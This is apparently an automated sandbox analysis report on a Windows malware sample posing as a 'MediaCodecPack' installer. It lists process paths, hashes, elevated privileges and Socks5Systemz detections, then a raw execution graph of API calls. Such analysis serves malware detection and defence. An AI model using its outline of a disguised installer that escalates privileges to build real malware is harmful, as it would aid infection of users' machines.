                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:1
                                                                              Start time:07:49:46
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                              Imagebase:0x400000
                                                                              File size:706'560 bytes
                                                                              MD5 hash:ED6A19AD054AD0172201AF725324781B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:07:49:47
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                                                                              Imagebase:0x400000
                                                                              File size:3'193'465 bytes
                                                                              MD5 hash:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:21.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:2.4%
                                                                                Total number of Nodes:1520
                                                                                Total number of Limit Nodes:22
                                                                                execution_graph 5445 407548 5446 407554 CloseHandle 5445->5446 5447 40755d 5445->5447 5446->5447 6682 402b48 RaiseException 5887 407749 5888 4076dc WriteFile 5887->5888 5893 407724 5887->5893 5889 4076e8 5888->5889 5890 4076ef 5888->5890 5891 40748c 35 API calls 5889->5891 5892 407700 5890->5892 5894 4073ec 34 API calls 5890->5894 5891->5890 5893->5887 5895 4077e0 5893->5895 5894->5892 5896 4078db InterlockedExchange 5895->5896 5898 407890 5895->5898 5897 4078e7 5896->5897 6683 40294a 6684 402952 6683->6684 6685 402967 6684->6685 6686 403554 4 API calls 6684->6686 6686->6684 6687 403f4a 6688 403f53 6687->6688 6689 403f5c 6687->6689 6691 403f07 6688->6691 6694 403f09 6691->6694 6693 403f3c 6693->6689 6695 403154 4 API calls 6694->6695 6697 403e9c 6694->6697 6700 403f3d 6694->6700 6714 403e9c 6694->6714 6695->6694 6696 403ef2 6699 402674 4 API calls 6696->6699 6697->6693 6697->6696 6702 403ea9 6697->6702 6705 403e8e 6697->6705 6704 403ecf 6699->6704 6700->6689 6703 402674 4 API calls 6702->6703 6702->6704 6703->6704 6704->6689 6706 403e4c 6705->6706 6707 403e62 6706->6707 6708 403e7b 6706->6708 6710 403e67 6706->6710 6709 403cc8 4 API calls 6707->6709 6711 402674 4 API calls 6708->6711 6709->6710 6712 403e78 6710->6712 6713 402674 4 API calls 6710->6713 6711->6712 6712->6696 6712->6702 6713->6712 6715 403ed7 6714->6715 6721 403ea9 6714->6721 6716 403ef2 6715->6716 6718 403e8e 4 API calls 6715->6718 6719 402674 4 API calls 6716->6719 6717 403ecf 6717->6694 6720 403ee6 6718->6720 6719->6717 6720->6716 6720->6721 6721->6717 6722 402674 4 API calls 6721->6722 6722->6717 6241 40ac4f 6242 40abc1 6241->6242 6243 4094d8 9 API calls 6242->6243 6245 40abed 6242->6245 6243->6245 6244 40ac06 6246 40ac1a 6244->6246 6247 40ac0f DestroyWindow 6244->6247 6245->6244 6248 40ac00 RemoveDirectoryA 6245->6248 6249 40ac42 6246->6249 6250 40357c 4 API calls 6246->6250 6247->6246 6248->6244 6251 40ac38 6250->6251 6252 4025ac 4 API calls 6251->6252 6252->6249 6253 403a52 6254 403a74 6253->6254 6255 403a5a WriteFile 6253->6255 6255->6254 6256 403a78 GetLastError 6255->6256 6256->6254 6257 402654 6258 403154 4 API calls 6257->6258 6259 402614 6258->6259 6260 402632 6259->6260 6261 403154 4 API calls 6259->6261 6260->6260 6261->6260 6262 40ac56 6263 40ac5d 6262->6263 6265 40ac88 6262->6265 6272 409448 6263->6272 6267 403198 4 API calls 6265->6267 6266 40ac62 6266->6265 6269 40ac80 MessageBoxA 6266->6269 6268 40acc0 6267->6268 6270 403198 4 API calls 6268->6270 6269->6265 6271 40acc8 6270->6271 6273 409454 GetCurrentProcess OpenProcessToken 6272->6273 6274 4094af ExitWindowsEx 6272->6274 6275 409466 6273->6275 6276 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6273->6276 6274->6275 6275->6266 6276->6274 6276->6275 6731 40995e 6733 409960 6731->6733 6732 409982 6733->6732 6734 40999e CallWindowProcA 6733->6734 6734->6732 6735 409960 6736 409982 6735->6736 6738 40996f 6735->6738 6737 40999e CallWindowProcA 6737->6736 6738->6736 6738->6737 6739 405160 6740 405173 6739->6740 6741 404e58 33 API calls 6740->6741 6742 405187 6741->6742 6277 402e64 6278 402e69 6277->6278 6279 402e7a RtlUnwind 6278->6279 6280 402e5e 6278->6280 6281 402e9d 6279->6281 5899 40766c SetFilePointer 5900 4076a3 5899->5900 5901 407693 GetLastError 5899->5901 5901->5900 5902 40769c 5901->5902 5903 40748c 35 API calls 5902->5903 5903->5900 6294 40667c IsDBCSLeadByte 6295 406694 6294->6295 6755 403f7d 6756 403fa2 6755->6756 6759 403f84 6755->6759 6758 403e8e 4 API calls 6756->6758 6756->6759 6757 403f8c 6758->6759 6759->6757 6760 402674 4 API calls 6759->6760 6761 403fca 6760->6761 6762 403d02 6768 403d12 6762->6768 6763 403ddf ExitProcess 6764 403db8 6765 403cc8 4 API calls 6764->6765 6767 403dc2 6765->6767 6766 403dea 6769 403cc8 4 API calls 6767->6769 6768->6763 6768->6764 6768->6766 6768->6768 6772 403da4 6768->6772 6773 403d8f MessageBoxA 6768->6773 6770 403dcc 6769->6770 6782 4019dc 6770->6782 6778 403fe4 6772->6778 6773->6764 6774 403dd1 6774->6763 6774->6766 6779 403fe8 6778->6779 6780 403f07 4 API calls 6779->6780 6781 404006 6780->6781 6783 401abb 6782->6783 6784 4019ed 6782->6784 6783->6774 6785 401a04 RtlEnterCriticalSection 6784->6785 6786 401a0e LocalFree 6784->6786 6785->6786 6787 401a41 6786->6787 6788 401a2f VirtualFree 6787->6788 6789 401a49 6787->6789 6788->6787 6790 401a70 LocalFree 6789->6790 6791 401a87 6789->6791 6790->6790 6790->6791 6792 401aa9 RtlDeleteCriticalSection 6791->6792 6793 401a9f RtlLeaveCriticalSection 6791->6793 6792->6774 6793->6792 6300 404206 6301 4041cc 6300->6301 6304 40420a 6300->6304 6302 404282 6303 403154 4 API calls 6305 404323 6303->6305 6304->6302 6304->6303 6306 402c08 6307 402c82 6306->6307 6310 402c19 6306->6310 6308 402c56 RtlUnwind 6309 403154 4 API calls 6308->6309 6309->6307 6310->6307 6310->6308 6313 402b28 6310->6313 6314 402b31 RaiseException 6313->6314 6315 402b47 6313->6315 6314->6315 6315->6308 6316 408c10 6317 408c17 6316->6317 6318 403198 4 API calls 6317->6318 6326 408cb1 6318->6326 6319 408cdc 6320 4031b8 4 API calls 6319->6320 6321 408d69 6320->6321 6322 408cc8 6324 4032fc 18 API calls 6322->6324 6323 403278 18 API calls 6323->6326 6324->6319 6325 4032fc 18 API calls 6325->6326 6326->6319 6326->6322 6326->6323 6326->6325 6331 40a814 6332 40a839 6331->6332 6333 40993c 29 API calls 6332->6333 6336 40a83e 6333->6336 6334 40a891 6365 4026c4 GetSystemTime 6334->6365 6336->6334 6339 408dd8 18 API calls 6336->6339 6337 40a896 6338 409330 46 API calls 6337->6338 6340 40a89e 6338->6340 6341 40a86d 6339->6341 6342 4031e8 18 API calls 6340->6342 6345 40a875 MessageBoxA 6341->6345 6343 40a8ab 6342->6343 6344 406928 19 API calls 6343->6344 6346 40a8b8 6344->6346 6345->6334 6347 40a882 6345->6347 6348 4066c0 19 API calls 6346->6348 6349 405864 19 API calls 6347->6349 6350 40a8c8 6348->6350 6349->6334 6351 406638 19 API calls 6350->6351 6352 40a8d9 6351->6352 6353 403340 18 API calls 6352->6353 6354 40a8e7 6353->6354 6355 4031e8 18 API calls 6354->6355 6356 40a8f7 6355->6356 6357 4074e0 37 API calls 6356->6357 6358 40a936 6357->6358 6359 402594 18 API calls 6358->6359 6360 40a956 6359->6360 6361 407a28 19 API calls 6360->6361 6362 40a998 6361->6362 6363 407cb8 35 API calls 6362->6363 6364 40a9bf 6363->6364 6365->6337 5443 407017 5444 407008 SetErrorMode 5443->5444 6366 403018 6367 403070 6366->6367 6368 403025 6366->6368 6369 40302a RtlUnwind 6368->6369 6370 40304e 6369->6370 6372 402f78 6370->6372 6373 402be8 6370->6373 6374 402bf1 RaiseException 6373->6374 6375 402c04 6373->6375 6374->6375 6375->6367 6380 40901e 6381 409010 6380->6381 6382 408fac Wow64RevertWow64FsRedirection 6381->6382 6383 409018 6382->6383 6384 409020 SetLastError 6385 409029 6384->6385 6400 403a28 ReadFile 6401 403a46 6400->6401 6402 403a49 GetLastError 6400->6402 5904 40762c ReadFile 5905 407663 5904->5905 5906 40764c 5904->5906 5907 407652 GetLastError 5906->5907 5908 40765c 5906->5908 5907->5905 5907->5908 5909 40748c 35 API calls 5908->5909 5909->5905 6804 40712e 6805 407118 6804->6805 6806 403198 4 API calls 6805->6806 6807 407120 6806->6807 6808 403198 4 API calls 6807->6808 6809 407128 6808->6809 5924 40a82f 5925 409ae8 18 API calls 5924->5925 5926 40a834 5925->5926 5927 40a839 5926->5927 5928 402f24 5 API calls 5926->5928 5961 40993c 5927->5961 5928->5927 5930 40a891 5966 4026c4 GetSystemTime 5930->5966 5932 40a83e 5932->5930 6027 408dd8 5932->6027 5933 40a896 5967 409330 5933->5967 5937 40a86d 5941 40a875 MessageBoxA 5937->5941 5938 4031e8 18 API calls 5939 40a8ab 5938->5939 5985 406928 5939->5985 5941->5930 5943 40a882 5941->5943 6030 405864 5943->6030 5948 40a8d9 6012 403340 5948->6012 5950 40a8e7 5951 4031e8 18 API calls 5950->5951 5952 40a8f7 5951->5952 5953 4074e0 37 API calls 5952->5953 5954 40a936 5953->5954 5955 402594 18 API calls 5954->5955 5956 40a956 5955->5956 5957 407a28 19 API calls 5956->5957 5958 40a998 5957->5958 5959 407cb8 35 API calls 5958->5959 5960 40a9bf 5959->5960 6034 40953c 5961->6034 5964 4098cc 19 API calls 5965 40995c 5964->5965 5965->5932 5966->5933 5976 409350 5967->5976 5970 409375 CreateDirectoryA 5971 4093ed 5970->5971 5972 40937f GetLastError 5970->5972 5973 40322c 4 API calls 5971->5973 5972->5976 5974 4093f7 5973->5974 5977 4031b8 4 API calls 5974->5977 5975 408dd8 18 API calls 5975->5976 5976->5970 5976->5975 5978 404c94 33 API calls 5976->5978 5981 407284 19 API calls 5976->5981 5983 408da8 18 API calls 5976->5983 5984 405890 18 API calls 5976->5984 6090 406cf4 5976->6090 6113 409224 5976->6113 5979 409411 5977->5979 5978->5976 5980 4031b8 4 API calls 5979->5980 5982 40941e 5980->5982 5981->5976 5982->5938 5983->5976 5984->5976 6219 406820 5985->6219 5988 403454 18 API calls 5989 40694a 5988->5989 5990 4066c0 5989->5990 6224 4068e4 5990->6224 5993 4066f0 5995 403340 18 API calls 5993->5995 5994 4066fe 5996 403454 18 API calls 5994->5996 5998 4066fc 5995->5998 5997 406711 5996->5997 5999 403340 18 API calls 5997->5999 6000 403198 4 API calls 5998->6000 5999->5998 6001 406733 6000->6001 6002 406638 6001->6002 6003 406642 6002->6003 6004 406665 6002->6004 6230 406950 6003->6230 6006 40322c 4 API calls 6004->6006 6008 40666e 6006->6008 6007 406649 6007->6004 6009 406654 6007->6009 6008->5948 6010 403340 18 API calls 6009->6010 6011 406662 6010->6011 6011->5948 6013 403344 6012->6013 6016 4033a5 6012->6016 6014 4031e8 6013->6014 6015 40334c 6013->6015 6019 403254 18 API calls 6014->6019 6022 4031fc 6014->6022 6015->6016 6018 40335b 6015->6018 6020 4031e8 18 API calls 6015->6020 6017 403228 6017->5950 6021 403254 18 API calls 6018->6021 6019->6022 6020->6018 6024 403375 6021->6024 6022->6017 6023 4025ac 4 API calls 6022->6023 6023->6017 6025 4031e8 18 API calls 6024->6025 6026 4033a1 6025->6026 6026->5950 6028 408da8 18 API calls 6027->6028 6029 408df4 6028->6029 6029->5937 6031 405869 6030->6031 6032 405940 19 API calls 6031->6032 6033 40587b 6032->6033 6033->6033 6041 40955b 6034->6041 6035 409590 6037 40959d GetUserDefaultLangID 6035->6037 6042 409592 6035->6042 6036 409594 6046 407024 GetModuleHandleA GetProcAddress 6036->6046 6037->6042 6040 40956f 6040->5964 6041->6035 6041->6036 6041->6040 6042->6040 6043 4095cb GetACP 6042->6043 6044 4095ef 6042->6044 6043->6040 6043->6042 6044->6040 6045 409615 GetACP 6044->6045 6045->6040 6045->6044 6047 407067 6046->6047 6048 40705e 6046->6048 6049 407070 6047->6049 6050 4070a8 6047->6050 6057 403198 4 API calls 6048->6057 6067 406f68 6049->6067 6051 406f68 RegOpenKeyExA 6050->6051 6055 4070c1 6051->6055 6053 407089 6054 4070de 6053->6054 6070 406f5c 6053->6070 6059 40322c 4 API calls 6054->6059 6055->6054 6058 406f5c 20 API calls 6055->6058 6061 407120 6057->6061 6062 4070d5 RegCloseKey 6058->6062 6063 4070eb 6059->6063 6064 403198 4 API calls 6061->6064 6062->6054 6065 4032fc 18 API calls 6063->6065 6066 407128 6064->6066 6065->6048 6066->6042 6068 406f73 6067->6068 6069 406f79 RegOpenKeyExA 6067->6069 6068->6069 6069->6053 6073 406e10 6070->6073 6074 406e36 RegQueryValueExA 6073->6074 6075 406e59 6074->6075 6080 406e7b 6074->6080 6076 406e73 6075->6076 6075->6080 6081 403278 18 API calls 6075->6081 6082 403420 18 API calls 6075->6082 6078 403198 4 API calls 6076->6078 6077 403198 4 API calls 6079 406f47 RegCloseKey 6077->6079 6078->6080 6079->6054 6080->6077 6081->6075 6083 406eb0 RegQueryValueExA 6082->6083 6083->6074 6084 406ecc 6083->6084 6084->6080 6085 4034f0 18 API calls 6084->6085 6086 406f0e 6085->6086 6087 406f20 6086->6087 6089 403420 18 API calls 6086->6089 6088 4031e8 18 API calls 6087->6088 6088->6080 6089->6087 6132 406a58 6090->6132 6094 406a58 19 API calls 6096 406d36 6094->6096 6095 406d26 6095->6094 6097 406d72 6095->6097 6098 406d42 6096->6098 6100 406a34 21 API calls 6096->6100 6140 406888 6097->6140 6098->6097 6101 406d67 6098->6101 6104 406a58 19 API calls 6098->6104 6100->6098 6101->6097 6152 406cc8 GetWindowsDirectoryA 6101->6152 6106 406d5b 6104->6106 6105 406638 19 API calls 6107 406d87 6105->6107 6106->6101 6108 406a34 21 API calls 6106->6108 6109 40322c 4 API calls 6107->6109 6108->6101 6110 406d91 6109->6110 6111 4031b8 4 API calls 6110->6111 6112 406dab 6111->6112 6112->5976 6114 409244 6113->6114 6115 406638 19 API calls 6114->6115 6116 40925d 6115->6116 6117 40322c 4 API calls 6116->6117 6122 409268 6117->6122 6119 406978 20 API calls 6119->6122 6120 4033b4 18 API calls 6120->6122 6121 408dd8 18 API calls 6121->6122 6122->6119 6122->6120 6122->6121 6123 405890 18 API calls 6122->6123 6125 4092e4 6122->6125 6192 4091b0 6122->6192 6200 409034 6122->6200 6123->6122 6126 40322c 4 API calls 6125->6126 6127 4092ef 6126->6127 6128 4031b8 4 API calls 6127->6128 6129 409309 6128->6129 6130 403198 4 API calls 6129->6130 6131 409311 6130->6131 6131->5976 6133 4034f0 18 API calls 6132->6133 6135 406a6b 6133->6135 6134 406a82 GetEnvironmentVariableA 6134->6135 6136 406a8e 6134->6136 6135->6134 6139 406a95 6135->6139 6154 406dec 6135->6154 6137 403198 4 API calls 6136->6137 6137->6139 6139->6095 6149 406a34 6139->6149 6141 403414 6140->6141 6142 4068ab GetFullPathNameA 6141->6142 6143 4068b7 6142->6143 6144 4068ce 6142->6144 6143->6144 6145 4068bf 6143->6145 6146 40322c 4 API calls 6144->6146 6147 403278 18 API calls 6145->6147 6148 4068cc 6146->6148 6147->6148 6148->6105 6158 4069dc 6149->6158 6153 406ce9 6152->6153 6153->6097 6155 406dfa 6154->6155 6156 4034f0 18 API calls 6155->6156 6157 406e08 6156->6157 6157->6135 6165 406978 6158->6165 6160 4069fe 6161 406a06 GetFileAttributesA 6160->6161 6162 406a1b 6161->6162 6163 403198 4 API calls 6162->6163 6164 406a23 6163->6164 6164->6095 6175 406744 6165->6175 6167 4069b0 6170 4069c6 6167->6170 6171 4069bb 6167->6171 6169 406989 6169->6167 6182 406970 CharPrevA 6169->6182 6183 403454 6170->6183 6172 40322c 4 API calls 6171->6172 6174 4069c4 6172->6174 6174->6160 6179 406755 6175->6179 6176 4067b9 6177 406680 IsDBCSLeadByte 6176->6177 6178 4067b4 6176->6178 6177->6178 6178->6169 6179->6176 6181 406773 6179->6181 6181->6178 6190 406680 IsDBCSLeadByte 6181->6190 6182->6169 6184 403486 6183->6184 6185 403459 6183->6185 6186 403198 4 API calls 6184->6186 6185->6184 6188 40346d 6185->6188 6187 40347c 6186->6187 6187->6174 6189 403278 18 API calls 6188->6189 6189->6187 6191 406694 6190->6191 6191->6181 6193 403198 4 API calls 6192->6193 6195 4091d1 6193->6195 6197 4091fe 6195->6197 6209 4032a8 6195->6209 6212 403494 6195->6212 6198 403198 4 API calls 6197->6198 6199 409213 6198->6199 6199->6122 6201 408f70 2 API calls 6200->6201 6202 40904a 6201->6202 6203 40904e 6202->6203 6216 406a48 6202->6216 6203->6122 6206 409081 6207 408fac Wow64RevertWow64FsRedirection 6206->6207 6208 409089 6207->6208 6208->6122 6210 403278 18 API calls 6209->6210 6211 4032b5 6210->6211 6211->6195 6213 403498 6212->6213 6215 4034c3 6212->6215 6214 4034f0 18 API calls 6213->6214 6214->6215 6215->6195 6217 4069dc 21 API calls 6216->6217 6218 406a52 GetLastError 6217->6218 6218->6206 6220 406744 IsDBCSLeadByte 6219->6220 6222 406835 6220->6222 6221 40687f 6221->5988 6222->6221 6223 406680 IsDBCSLeadByte 6222->6223 6223->6222 6225 4068f3 6224->6225 6226 406820 IsDBCSLeadByte 6225->6226 6228 4068fe 6226->6228 6227 4066ea 6227->5993 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 406957 6230->6231 6232 40695b 6230->6232 6231->6007 6235 406970 CharPrevA 6232->6235 6234 40696c 6234->6007 6235->6234 6810 408f30 6813 408dfc 6810->6813 6814 408e05 6813->6814 6815 403198 4 API calls 6814->6815 6816 408e13 6814->6816 6815->6814 6817 403932 6818 403924 6817->6818 6819 40374c VariantClear 6818->6819 6820 40392c 6819->6820 5380 4075c4 SetFilePointer 5381 4075f7 5380->5381 5382 4075e7 GetLastError 5380->5382 5382->5381 5383 4075f0 5382->5383 5385 40748c GetLastError 5383->5385 5388 4073ec 5385->5388 5389 407284 19 API calls 5388->5389 5390 407414 5389->5390 5391 407434 5390->5391 5392 405194 33 API calls 5390->5392 5393 405890 18 API calls 5391->5393 5392->5391 5394 407443 5393->5394 5395 403198 4 API calls 5394->5395 5396 407460 5395->5396 5396->5381 6411 4076c8 WriteFile 6412 4076e8 6411->6412 6413 4076ef 6411->6413 6414 40748c 35 API calls 6412->6414 6415 407700 6413->6415 6416 4073ec 34 API calls 6413->6416 6414->6413 6416->6415 6417 402ccc 6420 402cfe 6417->6420 6421 402cdd 6417->6421 6418 402d88 RtlUnwind 6419 403154 4 API calls 6418->6419 6419->6420 6421->6418 6421->6420 6422 402b28 RaiseException 6421->6422 6423 402d7f 6422->6423 6423->6418 6829 403fcd 6830 403f07 4 API calls 6829->6830 6831 403fd6 6830->6831 6832 403e9c 4 API calls 6831->6832 6833 403fe2 6832->6833 6430 4024d0 6431 4024e4 6430->6431 6432 4024e9 6430->6432 6435 401918 4 API calls 6431->6435 6433 402518 6432->6433 6434 40250e RtlEnterCriticalSection 6432->6434 6437 4024ed 6432->6437 6445 402300 6433->6445 6434->6433 6435->6432 6438 402525 6441 402581 6438->6441 6442 402577 RtlLeaveCriticalSection 6438->6442 6440 401fd4 14 API calls 6443 402531 6440->6443 6442->6441 6443->6438 6444 40215c 9 API calls 6443->6444 6444->6438 6446 402314 6445->6446 6448 4023b8 6446->6448 6450 402335 6446->6450 6447 402344 6447->6438 6447->6440 6448->6447 6449 401d80 9 API calls 6448->6449 6453 402455 6448->6453 6455 401e84 6448->6455 6449->6448 6450->6447 6452 401b74 9 API calls 6450->6452 6452->6447 6453->6447 6454 401d00 9 API calls 6453->6454 6454->6447 6460 401768 6455->6460 6457 401e99 6458 401ea6 6457->6458 6459 401dcc 9 API calls 6457->6459 6458->6448 6459->6458 6461 401787 6460->6461 6462 40183b 6461->6462 6463 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6461->6463 6465 40132c LocalAlloc 6461->6465 6466 401821 6461->6466 6468 4017d6 6461->6468 6464 4015c4 VirtualAlloc 6462->6464 6469 4017e7 6462->6469 6463->6461 6464->6469 6465->6461 6467 40150c VirtualFree 6466->6467 6467->6469 6470 40150c VirtualFree 6468->6470 6469->6457 6470->6469 6471 4028d2 6472 4028da 6471->6472 6473 403554 4 API calls 6472->6473 6474 4028ef 6472->6474 6473->6472 6475 4025ac 4 API calls 6474->6475 6476 4028f4 6475->6476 6834 4019d3 6835 4019ba 6834->6835 6836 4019c3 RtlLeaveCriticalSection 6835->6836 6837 4019cd 6835->6837 6836->6837 5397 407fd4 5398 407fe6 5397->5398 5400 407fed 5397->5400 5408 407f10 5398->5408 5402 408017 5400->5402 5404 408015 5400->5404 5407 408021 5400->5407 5401 40804e 5419 407d7c 5402->5419 5403 407d7c 33 API calls 5403->5401 5422 407e2c 5404->5422 5407->5401 5407->5403 5409 407f25 5408->5409 5410 407d7c 33 API calls 5409->5410 5411 407f34 5409->5411 5410->5411 5412 407f6e 5411->5412 5413 407d7c 33 API calls 5411->5413 5414 407f82 5412->5414 5415 407d7c 33 API calls 5412->5415 5413->5412 5418 407fae 5414->5418 5429 407eb8 5414->5429 5415->5414 5418->5400 5432 4058c4 5419->5432 5421 407d9e 5421->5407 5423 405194 33 API calls 5422->5423 5424 407e57 5423->5424 5440 407de4 5424->5440 5426 407e5f 5427 403198 4 API calls 5426->5427 5428 407e74 5427->5428 5428->5407 5430 407ec7 VirtualFree 5429->5430 5431 407ed9 VirtualAlloc 5429->5431 5430->5431 5431->5418 5434 4058d0 5432->5434 5433 405194 33 API calls 5435 4058fd 5433->5435 5434->5433 5436 4031e8 18 API calls 5435->5436 5437 405908 5436->5437 5438 403198 4 API calls 5437->5438 5439 40591d 5438->5439 5439->5421 5441 4058c4 33 API calls 5440->5441 5442 407e06 5441->5442 5442->5426 6477 405ad4 6478 405adc 6477->6478 6480 405ae4 6477->6480 6479 405aeb 6478->6479 6481 405ae2 6478->6481 6482 405940 19 API calls 6479->6482 6484 405a4c 6481->6484 6482->6480 6485 405a54 6484->6485 6486 405a6e 6485->6486 6487 403154 4 API calls 6485->6487 6488 405a73 6486->6488 6489 405a8a 6486->6489 6487->6485 6491 405940 19 API calls 6488->6491 6490 403154 4 API calls 6489->6490 6493 405a8f 6490->6493 6492 405a86 6491->6492 6495 403154 4 API calls 6492->6495 6494 4059b0 33 API calls 6493->6494 6494->6492 6496 405ab8 6495->6496 6497 403154 4 API calls 6496->6497 6498 405ac6 6497->6498 6498->6480 5910 40a9de 5911 40aa03 5910->5911 5912 407918 InterlockedExchange 5911->5912 5913 40aa2d 5912->5913 5914 409ae8 18 API calls 5913->5914 5915 40aa3d 5913->5915 5914->5915 5920 4076ac SetEndOfFile 5915->5920 5917 40aa59 5918 4025ac 4 API calls 5917->5918 5919 40aa90 5918->5919 5921 4076c3 5920->5921 5922 4076bc 5920->5922 5921->5917 5923 40748c 35 API calls 5922->5923 5923->5921 6841 402be9 RaiseException 6842 402c04 6841->6842 6509 402af2 6510 402afe 6509->6510 6513 402ed0 6510->6513 6514 403154 4 API calls 6513->6514 6516 402ee0 6514->6516 6515 402b03 6516->6515 6518 402b0c 6516->6518 6519 402b25 6518->6519 6520 402b15 RaiseException 6518->6520 6519->6515 6520->6519 5448 40a5f8 5491 4030dc 5448->5491 5450 40a60e 5494 4042e8 5450->5494 5452 40a613 5497 40457c GetModuleHandleA GetProcAddress 5452->5497 5456 40a61d 5505 4065c8 5456->5505 5458 40a622 5514 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5458->5514 5468 40a665 5536 406c2c 5468->5536 5469 4031e8 18 API calls 5470 40a683 5469->5470 5550 4074e0 5470->5550 5476 407918 InterlockedExchange 5479 40a6d2 5476->5479 5477 40a710 5570 4074a0 5477->5570 5479->5477 5607 409ae8 5479->5607 5480 40a751 5574 407a28 5480->5574 5481 40a736 5481->5480 5482 409ae8 18 API calls 5481->5482 5482->5480 5484 40a776 5584 408b08 5484->5584 5488 40a7bc 5489 408b08 35 API calls 5488->5489 5490 40a7f5 5488->5490 5489->5488 5617 403094 5491->5617 5493 4030e1 GetModuleHandleA GetCommandLineA 5493->5450 5495 403154 4 API calls 5494->5495 5496 404323 5494->5496 5495->5496 5496->5452 5498 404598 5497->5498 5499 40459f GetProcAddress 5497->5499 5498->5499 5500 4045b5 GetProcAddress 5499->5500 5501 4045ae 5499->5501 5502 4045c4 SetProcessDEPPolicy 5500->5502 5503 4045c8 5500->5503 5501->5500 5502->5503 5504 404624 6FCB1CD0 5503->5504 5504->5456 5618 405ca8 5505->5618 5515 4090f7 5514->5515 5702 406fa0 SetErrorMode 5515->5702 5518 407284 19 API calls 5519 409127 5518->5519 5520 403198 4 API calls 5519->5520 5521 40913c 5520->5521 5522 409b78 GetSystemInfo VirtualQuery 5521->5522 5523 409c2c 5522->5523 5526 409ba2 5522->5526 5528 409768 5523->5528 5524 409c0d VirtualQuery 5524->5523 5524->5526 5525 409bcc VirtualProtect 5525->5526 5526->5523 5526->5524 5526->5525 5527 409bfb VirtualProtect 5526->5527 5527->5524 5708 406bd0 GetCommandLineA 5528->5708 5530 409785 5531 409850 5530->5531 5532 406c2c 20 API calls 5530->5532 5535 403454 18 API calls 5530->5535 5533 4031b8 4 API calls 5531->5533 5532->5530 5534 40986a 5533->5534 5534->5468 5600 409c88 5534->5600 5535->5530 5537 406c53 GetModuleFileNameA 5536->5537 5538 406c77 GetCommandLineA 5536->5538 5539 403278 18 API calls 5537->5539 5546 406c7c 5538->5546 5540 406c75 5539->5540 5544 406ca4 5540->5544 5541 406c81 5542 403198 4 API calls 5541->5542 5545 406c89 5542->5545 5543 406af0 18 API calls 5543->5546 5547 403198 4 API calls 5544->5547 5548 40322c 4 API calls 5545->5548 5546->5541 5546->5543 5546->5545 5549 406cb9 5547->5549 5548->5544 5549->5469 5551 4074ea 5550->5551 5715 407576 5551->5715 5718 407578 5551->5718 5552 407516 5553 40752a 5552->5553 5554 40748c 35 API calls 5552->5554 5557 409c34 FindResourceA 5553->5557 5554->5553 5558 409c49 5557->5558 5559 409c4e SizeofResource 5557->5559 5560 409ae8 18 API calls 5558->5560 5561 409c60 LoadResource 5559->5561 5562 409c5b 5559->5562 5560->5559 5564 409c73 LockResource 5561->5564 5565 409c6e 5561->5565 5563 409ae8 18 API calls 5562->5563 5563->5561 5567 409c84 5564->5567 5568 409c7f 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5567->5476 5567->5479 5569 409ae8 18 API calls 5568->5569 5569->5567 5571 4074b4 5570->5571 5572 4074c4 5571->5572 5573 4073ec 34 API calls 5571->5573 5572->5481 5573->5572 5575 407a35 5574->5575 5576 405890 18 API calls 5575->5576 5577 407a89 5575->5577 5576->5577 5578 407918 InterlockedExchange 5577->5578 5579 407a9b 5578->5579 5580 405890 18 API calls 5579->5580 5581 407ab1 5579->5581 5580->5581 5582 405890 18 API calls 5581->5582 5583 407af4 5581->5583 5582->5583 5583->5484 5596 408b39 5584->5596 5598 408b82 5584->5598 5585 408bcd 5721 407cb8 5585->5721 5586 407cb8 35 API calls 5586->5596 5588 408be4 5591 4031b8 4 API calls 5588->5591 5589 4034f0 18 API calls 5589->5596 5590 4034f0 18 API calls 5590->5598 5593 408bfe 5591->5593 5592 4031e8 18 API calls 5592->5596 5614 404c20 5593->5614 5594 403420 18 API calls 5594->5596 5595 4031e8 18 API calls 5595->5598 5596->5586 5596->5589 5596->5592 5596->5594 5596->5598 